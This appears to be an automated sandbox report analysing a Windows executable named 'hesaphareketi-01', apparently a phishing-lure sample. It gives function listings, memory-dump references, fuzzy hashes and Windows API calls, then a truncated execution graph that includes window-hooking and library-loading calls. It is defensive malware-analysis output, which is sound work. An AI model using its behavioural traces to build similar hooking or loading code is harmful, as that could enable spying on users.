                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: cc35ecd5a93063da1183701248f17dca1c596e2e1d8d9986a40f28483dcd9575
                                                  • Instruction ID: 336a8976f99be9f28419eeeb11c8e537e941f71185d1ab295ce5594792266598
                                                  • Opcode Fuzzy Hash: cc35ecd5a93063da1183701248f17dca1c596e2e1d8d9986a40f28483dcd9575
                                                  • Instruction Fuzzy Hash: 99812021A0D90366FA1CBF27B8C0635A2D16F45754F840239DA5EC76E5DE3DF842BA31
                                                  Function 00007FF7341F9F60 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8155321a93176bc4c4200af923682af65ca18711955211ed52f216cd2b673b30
                                                  • Instruction ID: 361a4ece5902965c6c328a8be92ac8594639eb0b68ccc0cb0b99aa0e967cdd6f
                                                  • Opcode Fuzzy Hash: 8155321a93176bc4c4200af923682af65ca18711955211ed52f216cd2b673b30
                                                  • Instruction Fuzzy Hash: 6C71A322A0EA42A1EA58BF63B580279E3D5FF41BD4F880139DE5D97695DF3CE441A320
                                                  Function 00007FF7341FF8F0 Relevance: 7.8, APIs: 6, Instructions: 317COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: dfead87ec6108077648ad3825d3ea0080477edc8ca47081f20bdd0a0302174ed
                                                  • Instruction ID: 5c393fb41bdc3aee75531f715d8f02de5136935ae2bf64cd5e68f55a7550b2c0
                                                  • Opcode Fuzzy Hash: dfead87ec6108077648ad3825d3ea0080477edc8ca47081f20bdd0a0302174ed
                                                  • Instruction Fuzzy Hash: 29E10062B06E56A5DA18DF52E8946B8A390FF043F4F804336DA3D97BD8DE38D019D310
                                                  Function 00007FF7341D3500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise
                                                  • String ID: Process is terminating due to StackOverflowException.
                                                  • API String ID: 2546344036-2200901744
                                                  • Opcode ID: a73f9b0b1186b8bf137041686a0ee60befa2ebf5b9cf55ecf46c091e51a068e4
                                                  • Instruction ID: 10ab5ead5452b7c74e14079001085887467cf8c49a5e9965888c3df8410398cc
                                                  • Opcode Fuzzy Hash: a73f9b0b1186b8bf137041686a0ee60befa2ebf5b9cf55ecf46c091e51a068e4
                                                  • Instruction Fuzzy Hash: 2051B873A08E4661EE58AF17E8C03B993A0EF4AB94F844135D91ED7790DF3DE455A320
                                                  Function 00007FF734212DC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,?,000002367F400000,00007FF734212EBD,?,?,00000000,00007FF7341FF8AC,?,FFFFFFFF,47AE147AE147AE15,00007FF7341E945C), ref: 00007FF734212E12
                                                  • GetProcAddress.KERNEL32(?,?,?,?,000002367F400000,00007FF734212EBD,?,?,00000000,00007FF7341FF8AC,?,FFFFFFFF,47AE147AE147AE15,00007FF7341E945C), ref: 00007FF734212E2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                                                  • API String ID: 2574300362-4754247
                                                  • Opcode ID: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
                                                  • Instruction ID: 11d245af992c869873ea92042eeaa1e82e60f91f456b80e3d1e451abbb5e5023
                                                  • Opcode Fuzzy Hash: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
                                                  • Instruction Fuzzy Hash: 1C21EB51F1C15252FFAC9B66E8D137993A19B54390FC44039E90EF67D4DD1EF880A620
                                                  Function 00007FF7341DAF90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetEnabledXStateFeatures$kernel32
                                                  • API String ID: 2574300362-4273408117
                                                  • Opcode ID: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
                                                  • Instruction ID: e45e8f7b53de73d1acc3118edbdf29fdf46fcbeb60504d5c20a41cf2d46dd969
                                                  • Opcode Fuzzy Hash: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
                                                  • Instruction Fuzzy Hash: 10E0BF55F0AB12A2FE4DBF576CD127893516F45781FC84078C90D92390EE3CA659A720
                                                  Function 00007FF7341DAFE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetEnabledXStateFeatures$kernel32
                                                  • API String ID: 2574300362-4273408117
                                                  • Opcode ID: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
                                                  • Instruction ID: 8d5f2fa6c870154c6b8a9087a008e94d3eafc30e8031b6d0146797c24e0899f7
                                                  • Opcode Fuzzy Hash: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
                                                  • Instruction Fuzzy Hash: 3CE04F55F1A602A2FF4DBF53ACC53B593606F99741FC84138C91E92391AD3CA24AB720
                                                  Function 00007FF73420E700 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: f4aaa3f96c492ce6e17f0f5d835cb774c61d338c5d6bba280d5d4821285017cf
                                                  • Instruction ID: 6a1f56622fc5709d4cc5efc0548a3b000cfd6ee8ec324a3fa6eb0d25fc77fac5
                                                  • Opcode Fuzzy Hash: f4aaa3f96c492ce6e17f0f5d835cb774c61d338c5d6bba280d5d4821285017cf
                                                  • Instruction Fuzzy Hash: 0D410832E0855291EF6CAE27D0C413DE2D0EF14F94F94853AD61ED67E5CE2DE480A762
                                                  Function 00007FF7341F19FD Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: 44b941e54b3c05b20f0b851b031452e57e334a5e19445be4892a4e80d52cd89e
                                                  • Instruction ID: 37d87e9f65da8fae5b7fc7546072106b0241e0f000ff300c79644f8ba4c8896d
                                                  • Opcode Fuzzy Hash: 44b941e54b3c05b20f0b851b031452e57e334a5e19445be4892a4e80d52cd89e
                                                  • Instruction Fuzzy Hash: 42514E21E0A94366FA9CBF27B9C4675B2E46F01750F844239DA1DD72D1DE2DBC02B630
                                                  Function 00007FF73420EE70 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakDebug
                                                  • String ID:
                                                  • API String ID: 456121617-0
                                                  • Opcode ID: e4ab8514af3f6f014f6506373d7b9cbb823d7638c04cae421d012170a137b048
                                                  • Instruction ID: 0991d4f105f01a96755388ab579b474d7193211aa49081799b53c3e81d9fca84
                                                  • Opcode Fuzzy Hash: e4ab8514af3f6f014f6506373d7b9cbb823d7638c04cae421d012170a137b048
                                                  • Instruction Fuzzy Hash: D0411922A0D685A1FA596F12A08C379E7E0EF44B54F890438CE4DA7395CFBDE4C1D322
                                                  Function 00007FF7341FD010 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakDebug
                                                  • String ID:
                                                  • API String ID: 456121617-0
                                                  • Opcode ID: 5f868e6883e4306e4798fc5c7dca6ba7319e688e635161da728f78dd99401986
                                                  • Instruction ID: dc4a53e9e8f8fefa50c0ac2b8808316d834fa06d46bbb8becd3cf4f834f8b3b0
                                                  • Opcode Fuzzy Hash: 5f868e6883e4306e4798fc5c7dca6ba7319e688e635161da728f78dd99401986
                                                  • Instruction Fuzzy Hash: FD31A32260AF4592EA297F52B080279E7E4FB44B84F880234DF4E87695DF7CE442A724
                                                  Function 00007FF7341DAB10 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB44
                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB4E
                                                  • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB6D
                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastMultipleWait$HandlesObjects
                                                  • String ID:
                                                  • API String ID: 2817213684-0
                                                  • Opcode ID: 2e4193dc27507b0cc0785436bf69825b5bf5a88872f1136b1b91a9cdfbe48115
                                                  • Instruction ID: 732131e62a3ecddfe205f63c9d31e9c4541773b083e899c274da19f6cd08f879
                                                  • Opcode Fuzzy Hash: 2e4193dc27507b0cc0785436bf69825b5bf5a88872f1136b1b91a9cdfbe48115
                                                  • Instruction Fuzzy Hash: 1D11737270CA5592DB589F1BB88013AF361FF45B90F940139EA8D83BA8CF3CD4019754
                                                  Function 00007FF7342392DC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: b684cd9f6bae3ddb2e4f8fdc1087b23f524d747017c22d8809c7f62526f24cc6
                                                  • Instruction ID: 797ef252f9848763cd32a10150d1445c8bfd33e706454b5a213c5805e45a5fb4
                                                  • Opcode Fuzzy Hash: b684cd9f6bae3ddb2e4f8fdc1087b23f524d747017c22d8809c7f62526f24cc6
                                                  • Instruction Fuzzy Hash: C7115E22B14F0599EB00DF71F8942B873A4FB19B58F840E35DA6D977A4DF78D1548350
                                                  Function 00007FF73423A65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7342397EB), ref: 00007FF73423A6AC
                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7342397EB), ref: 00007FF73423A6ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 305dc0d90ba247bf77b3081513aed6e1274f9ee9982620d9ea7225f6e90881e8
                                                  • Instruction ID: 3399f022aa6df9df81a8d41cd43a398219ca90cd542aaf9995ccfb850671e5e9
                                                  • Opcode Fuzzy Hash: 305dc0d90ba247bf77b3081513aed6e1274f9ee9982620d9ea7225f6e90881e8
                                                  • Instruction Fuzzy Hash: 2F116D32608B4192EB259F16F880269B7E0FB88B84F994235EE8C57768DF3DC551CB00
                                                  Function 00007FF7341F3C20 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3C6A
                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3CAC
                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3CD7
                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3CF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 045b48fe72bcf7abecfebc8b7f0e13c8ed7eea996b5e53e3f88679adc4f03f51
                                                  • Instruction ID: ebd4c3448d398e704e36a54116db556f20c519aec18e5673dc49eacf42fc7b22
                                                  • Opcode Fuzzy Hash: 045b48fe72bcf7abecfebc8b7f0e13c8ed7eea996b5e53e3f88679adc4f03f51
                                                  • Instruction Fuzzy Hash: 36213C62B08906A1EE48EF16E8C53B4A254FF153A0FC80239D52DD69D59F7CE895E321

                                                  Execution Graph

                                                  Execution Coverage:10.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:169
                                                  Total number of Limit Nodes:25
                                                  execution_graph 38306 61d7b0c 38307 61d7ac7 38306->38307 38309 61d7ae3 38307->38309 38310 61d620c 38307->38310 38311 61d7f20 OleInitialize 38310->38311 38312 61d7f84 38311->38312 38312->38309 38221 61d6478 DuplicateHandle 38222 61d650e 38221->38222 38313 61d9c68 38314 61d9bf8 SetWindowsHookExA 38313->38314 38317 61d9c77 38313->38317 38316 61d9c3a 38314->38316 38318 ded044 38319 ded05c 38318->38319 38320 ded0b6 38319->38320 38325 61d0624 38319->38325 38333 61d2742 38319->38333 38337 61d2750 38319->38337 38341 61d7070 38319->38341 38326 61d062f 38325->38326 38327 61d70e1 38326->38327 38329 61d70d1 38326->38329 38361 61d5f7c 38327->38361 38349 61d7208 38329->38349 38355 61d71f8 38329->38355 38330 61d70df 38334 61d2776 38333->38334 38335 61d0624 2 API calls 38334->38335 38336 61d2797 38335->38336 38336->38320 38338 61d2776 38337->38338 38339 61d0624 2 API calls 38338->38339 38340 61d2797 38339->38340 38340->38320 38342 61d7080 38341->38342 38343 61d70e1 38342->38343 38345 61d70d1 38342->38345 38344 61d5f7c 2 API calls 38343->38344 38346 61d70df 38344->38346 38347 61d7208 2 API calls 38345->38347 38348 61d71f8 2 API calls 38345->38348 38346->38346 38347->38346 38348->38346 38351 61d7216 38349->38351 38350 61d5f7c 2 API calls 38350->38351 38351->38350 38352 61d72f6 38351->38352 38368 61d76f0 38351->38368 38373 61d76e0 38351->38373 38352->38330 38357 61d7208 38355->38357 38356 